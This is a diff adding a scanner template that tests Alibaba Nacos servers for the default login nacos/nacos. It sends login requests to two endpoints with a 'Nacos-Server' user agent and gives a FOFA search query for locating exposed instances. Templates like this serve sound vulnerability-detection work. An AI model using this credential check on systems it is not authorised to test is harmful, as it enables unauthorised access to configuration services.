diff --git a/http/default-logins/nacos/nacos-default-login.yaml b/http/default-logins/nacos/nacos-default-login.yaml
new file mode 100644
index 0000000000..87e071564d
--- /dev/null
+++ b/http/default-logins/nacos/nacos-default-login.yaml
@@ -0,0 +1,57 @@
+id: nacos-default-login
+
+info:
+  name: Alibaba Nacos - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    The default username and password for Nacos are both nacos.
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title=="Nacos"
+  tags: nacos,default-login,alibaba
+
+http:
+  - raw:
+      - |
+        POST /v1/auth/users/login  HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Nacos-Server
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /nacos/v1/auth/users/login  HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Nacos-Server
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - nacos
+      password:
+        - nacos
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"accessToken":'
+          - '"username":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200